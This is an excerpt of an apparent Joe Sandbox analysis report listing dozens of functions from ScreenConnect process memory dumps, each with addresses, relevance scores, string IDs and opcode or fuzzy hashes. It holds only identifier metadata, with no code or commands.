                                                                                                                                                                                                                                          Function 01F45E10 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: nCuq
                                                                                                                                                                                                                                          • API String ID: 0-4247494828
                                                                                                                                                                                                                                          • Opcode ID: 2dbd1e1f2c95af7564d912c6ea4738d4df9b6b74a350577aef87329def9f64b6
                                                                                                                                                                                                                                          • Instruction ID: 4cbb85f4ebe0c7cbdc93fc7e314b9915998b0e6f88480529a07d19b30685f3cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2dbd1e1f2c95af7564d912c6ea4738d4df9b6b74a350577aef87329def9f64b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F519270B402058FDB24EF39D854A6EBBE6EF88250B104469E506DB365EF76EC06CB91
                                                                                                                                                                                                                                          Function 01F4C71E Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q
                                                                                                                                                                                                                                          • API String ID: 0-1007455737
                                                                                                                                                                                                                                          • Opcode ID: d2fc299dad23257ff440dd244e4af3d1c168c31864522b48a53f167047843bc7
                                                                                                                                                                                                                                          • Instruction ID: b04d3e42d49659a7dab28e3fea64aab9f48695182e5f1f4f79b2c5003a4f5c5b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2fc299dad23257ff440dd244e4af3d1c168c31864522b48a53f167047843bc7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC517E30E01709CFDB15EFA8C458AADBBB2FF85300F118969D846AB365EB35D985CB40
                                                                                                                                                                                                                                          Function 01F45DE0 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: nCuq
                                                                                                                                                                                                                                          • API String ID: 0-4247494828
                                                                                                                                                                                                                                          • Opcode ID: 68095980e2aeb93dbacdcd6e636d5257069e156e645650b6d1320dc1c4941848
                                                                                                                                                                                                                                          • Instruction ID: 7b862da5b8694651a8fe71968d28d904d3c2e037f609595e04f8fdd2580dc950
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68095980e2aeb93dbacdcd6e636d5257069e156e645650b6d1320dc1c4941848
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC415C70B402068FDB25EF28D554A6EBBE2AF88210B148469D406DB365EF75DC06CB91
                                                                                                                                                                                                                                          Function 01F47E70 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (aq
                                                                                                                                                                                                                                          • API String ID: 0-600464949
                                                                                                                                                                                                                                          • Opcode ID: 3fd2fbc551f76ac16f4e454d5454c6208de8321716ab73b60f3b670b44c714ac
                                                                                                                                                                                                                                          • Instruction ID: c1d34ab5c7bf8b369e07a366e807f67593f41feb25d894823fa747bd4195270f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fd2fbc551f76ac16f4e454d5454c6208de8321716ab73b60f3b670b44c714ac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8418031A40106CBDB25EF69E49456DBFB6FF84310B14C26AD9059B25ADF35EC06CBD0
                                                                                                                                                                                                                                          Function 01F46FE0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: {'
                                                                                                                                                                                                                                          • API String ID: 0-2381349322
                                                                                                                                                                                                                                          • Opcode ID: cef627909ff2889ec73d754aa5728d05f459676ae3fd912dc2afca3c3cfb0796
                                                                                                                                                                                                                                          • Instruction ID: 11595ae2ceb48ab6a8770ede9eac9d403b5b517ce219631ecb911d115eedd0b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cef627909ff2889ec73d754aa5728d05f459676ae3fd912dc2afca3c3cfb0796
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD41D0B1B012014FD706EB7DA8A085EBBA6FFC9650304456ED409EB355EF78AD09C7D1
                                                                                                                                                                                                                                          Function 044D0006 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          • Opcode ID: 2d0bed4b283eb04cf563fdf92561ef6c03cac8a2b7d865c44b751a9321d70918
                                                                                                                                                                                                                                          • Instruction ID: a689c1450eaf25b562fadcb9a5d5818b48e051140a7c7ef773c14952c8cec976
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d0bed4b283eb04cf563fdf92561ef6c03cac8a2b7d865c44b751a9321d70918
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C241C470B053499FDF268F60E4A42EE7FB2EF89708F14405BE40597392DA755D06CB51
                                                                                                                                                                                                                                          Function 044D2668 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 3]n^
                                                                                                                                                                                                                                          • API String ID: 0-4019350163
                                                                                                                                                                                                                                          • Opcode ID: 8c18b1b5c7210b7ec84b4c6f8733cecd741f8c24ee0a4969f89b5cd4618be0d7
                                                                                                                                                                                                                                          • Instruction ID: 95731c364258006f18e12c125a62f9b902933fe472d4022366e76538703f4f01
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c18b1b5c7210b7ec84b4c6f8733cecd741f8c24ee0a4969f89b5cd4618be0d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3313D34B106068BDF14DBA9C99056EF7F5FFC9214B10846BD50AE7368DB74EC058792
                                                                                                                                                                                                                                          Function 01F47018 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: {'
                                                                                                                                                                                                                                          • API String ID: 0-2381349322
                                                                                                                                                                                                                                          • Opcode ID: 91ab6d4919c522eb8b626ba8c56379c622a63a826b7adbf98917a3c1047d050d
                                                                                                                                                                                                                                          • Instruction ID: 1473554db0ca1e960c703926a27920bd95e71ca13eb245e08789502aca0bc496
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91ab6d4919c522eb8b626ba8c56379c622a63a826b7adbf98917a3c1047d050d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2731C371B002064BD715EB7DA89085EBBEAFFC86503108A2ED509EB354EF74ED098BD1
                                                                                                                                                                                                                                          Function 044D4790 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 0-3372436214
                                                                                                                                                                                                                                          • Opcode ID: 26f7a96fbeb374958aac6cc501db3e2e8989c0f5af08aaf5055627ee123f4454
                                                                                                                                                                                                                                          • Instruction ID: a33473f528a40441f67f9657a93a6c90d2037fb9b277540269f1270914211bf4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26f7a96fbeb374958aac6cc501db3e2e8989c0f5af08aaf5055627ee123f4454
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D31C135E006448FDF14CB68D964ADEBFF1FF8A300F1544AAD146AB362DA34AC46CB51
                                                                                                                                                                                                                                          Function 06351BA8 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: `Q]q
                                                                                                                                                                                                                                          • API String ID: 0-1594560043
                                                                                                                                                                                                                                          • Opcode ID: 82971101c56fdca34e3a3ad19dc355c4ce5ee1a7a49d271c4ca4af54df6c5d5d
                                                                                                                                                                                                                                          • Instruction ID: 4a812b39e2978bf86f7f7631f2195fc5b9d68f04124d3258dc555b27803a5c27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82971101c56fdca34e3a3ad19dc355c4ce5ee1a7a49d271c4ca4af54df6c5d5d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9313570E00208DFDB54DFA9D944BEEBBB6AF88304F148429E805AB350DBB96845CF91
                                                                                                                                                                                                                                          Function 044D0058 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          • Opcode ID: dda1732dfa6a9e34778b7f91d6b02df61797813798e4cd68282b9deace5e370b
                                                                                                                                                                                                                                          • Instruction ID: 9a44445a37c4b5b55f57750356ec9cb83666f56b2523feab090e0c869e82563e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dda1732dfa6a9e34778b7f91d6b02df61797813798e4cd68282b9deace5e370b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4531C770F012099FDF25CF64E4A87AE7BB2BF88719F24402AE406A7395DB706D02CB51
                                                                                                                                                                                                                                          Function 01F4E519 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          • Opcode ID: da72ee79f56dc5825508d4837011b877248d2cabe2b210ef9a7248499a1d6a2f
                                                                                                                                                                                                                                          • Instruction ID: 6705f7b011503d876d2e71a2b868bf2b0e4ae2ba3305c2227f2f575e556ad914
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da72ee79f56dc5825508d4837011b877248d2cabe2b210ef9a7248499a1d6a2f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B621D871B102049BDB289F65C899BBEBFB6FBC8700F18442DE406E7296EE759C01C791
                                                                                                                                                                                                                                          Function 044D0068 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          • Opcode ID: 3825efa2af43a33a8808c9ff4fe336a2bed8fb8b9b8c1a6a1028c53b3033a2f3
                                                                                                                                                                                                                                          • Instruction ID: e80a4a1acf1e4c4f2ead7492067e2e5e89322e153833c4ec4e49e367f0755c49
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3825efa2af43a33a8808c9ff4fe336a2bed8fb8b9b8c1a6a1028c53b3033a2f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E21A830F002099BDF24DF65E5A97AE7BB6BF88705F24801AE406A7384DF756D42CB91
                                                                                                                                                                                                                                          Function 044D2FF0 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q
                                                                                                                                                                                                                                          • API String ID: 0-1259897404
                                                                                                                                                                                                                                          • Opcode ID: 9f7fb84e2a1af8b3495bc138674973fe8d1a9c2a81486a16984f70939d652e0c
                                                                                                                                                                                                                                          • Instruction ID: 7f4ec49fb1b4e367b9b92e3e0248e38b058ec3815df989fbc206939fb9e39161
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f7fb84e2a1af8b3495bc138674973fe8d1a9c2a81486a16984f70939d652e0c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB01ADB0A4524EDFCF16DF68E9216AEBBB0EB42304F1089ABC005CB255DB345A05CB92
                                                                                                                                                                                                                                          Function 01F45408 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q
                                                                                                                                                                                                                                          • API String ID: 0-1007455737
                                                                                                                                                                                                                                          • Opcode ID: 2ac70e113d4e2f9e3868dd74bf4b6379cdbda240d0855349ea88f8e398af0d71
                                                                                                                                                                                                                                          • Instruction ID: 754166d12ba8bce7ba10093ea391057a7d185cc68c653f17e68d74222e7d3024
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ac70e113d4e2f9e3868dd74bf4b6379cdbda240d0855349ea88f8e398af0d71
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41E08670B85701CFD7119B68D5505117FB4BF1361230541E7D848CB632D326D891CB62
                                                                                                                                                                                                                                          Function 01F4D089 Relevance: .3, Instructions: 253COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8c5a3a7e2b711f13e837715dfb0665117eaa5e083573ef46c19a2949dfd9e31b
                                                                                                                                                                                                                                          • Instruction ID: 87481b3aa6259020bef594dc551323558d9054015f4bd4d7b752994021c15526
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c5a3a7e2b711f13e837715dfb0665117eaa5e083573ef46c19a2949dfd9e31b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BA11734B002058FDB14DFA8D594AADBBF6FF88314B1445A9E806AB369DB75ED01CF90
                                                                                                                                                                                                                                          Function 044D20F8 Relevance: .2, Instructions: 247COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f416478b8b759c6ff9fd812765ad849c0750dd31e50fc3f55dd2f41ea101ffdf
                                                                                                                                                                                                                                          • Instruction ID: 14a9036d24b5122f6e6a6381b35668f98d5e93be61806e0fc2be52b85827eb02
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f416478b8b759c6ff9fd812765ad849c0750dd31e50fc3f55dd2f41ea101ffdf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D881A031B002064BDF15DFA8C9605AEFBB2FFC5210B1585ABC5069B369EE74EC038792
                                                                                                                                                                                                                                          Function 044D4918 Relevance: .2, Instructions: 208COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 198682f2a220cb3be7dbf9ab3e880a18cf0eb5499c29ed259a9233c957dd5dca
                                                                                                                                                                                                                                          • Instruction ID: a89e43078a0ec805306a4297a68308bb96b875190396ac9c4b5d11643958406d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 198682f2a220cb3be7dbf9ab3e880a18cf0eb5499c29ed259a9233c957dd5dca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E61D275B002058FDB04EF69D4949AEBBF6FFC8654B14446AD40AEB365DB34EC06CB90
                                                                                                                                                                                                                                          Function 044D2150 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 608d2bf04603ebd426d2d3d49fd8cbc0d52114702afbc1198eac908fdcf874b8
                                                                                                                                                                                                                                          • Instruction ID: 6ee135b3c340efc34068737f63a7e456da71897bbd5083bdc5c41c3e0276e747
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 608d2bf04603ebd426d2d3d49fd8cbc0d52114702afbc1198eac908fdcf874b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A713E31B402068BDF15DEA8C96056FF7A6FFC8210B14856BD506EB368EF74EC028B91
                                                                                                                                                                                                                                          Function 01F49CFD Relevance: .2, Instructions: 178COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ce0f9301f2641f1eeb6892effc929a35c9fe8dae01f93e143f958d49e040053a
                                                                                                                                                                                                                                          • Instruction ID: 14d09c86d0b76072f16a1f9bed499b2df671bd89d7e4293dbd112dfd25c93121
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0f9301f2641f1eeb6892effc929a35c9fe8dae01f93e143f958d49e040053a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66513671B046408FD715CF38D8A4ADEBFB1FF89214B0541AAD442DB362DB799C0AC7A1
                                                                                                                                                                                                                                          Function 01F4E328 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 23acbd0bca21f15858c23a46227d00269d8d8e37edda719962cd9dd3f75d2a74
                                                                                                                                                                                                                                          • Instruction ID: f6c7ca16775ba2796a1172d80486512c8cf161edc8c809ccc4f29d3bcf85cb46
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23acbd0bca21f15858c23a46227d00269d8d8e37edda719962cd9dd3f75d2a74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86518F34B002018FDB14DF6CD59496ABBEAFFD8304B148469E14ACF326DB75EC028B91
                                                                                                                                                                                                                                          Function 01F4E338 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4a3c538654ba1d7d50c220e288c5941bc742b3d30028fd74c4e0a21d7ae4a511
                                                                                                                                                                                                                                          • Instruction ID: 5c9f887b753ef3f8f462a9006e74ef9601a1f8eb89659180d64e81a1f70c3f79
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a3c538654ba1d7d50c220e288c5941bc742b3d30028fd74c4e0a21d7ae4a511
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C516D34B002058FDB14DF6CD99496ABBEAFFD8304B148469E54ADB326DB75EC028B91
                                                                                                                                                                                                                                          Function 044D39E0 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9e1facff09d31dfe4a49053b07eae2e85e77217d9d74ab92906e974a997b8e29
                                                                                                                                                                                                                                          • Instruction ID: cad57dafa7b0adb31feb95f5a6fa356a00a8c45e15b7b9c4434c3eebd1ff95a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e1facff09d31dfe4a49053b07eae2e85e77217d9d74ab92906e974a997b8e29
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A51D2707412059BDB04EF79D860A2EB7A6FFC8644B18C92AD4059B365EF74EC16C781
                                                                                                                                                                                                                                          Function 044D39B1 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                          Download Yara Rule
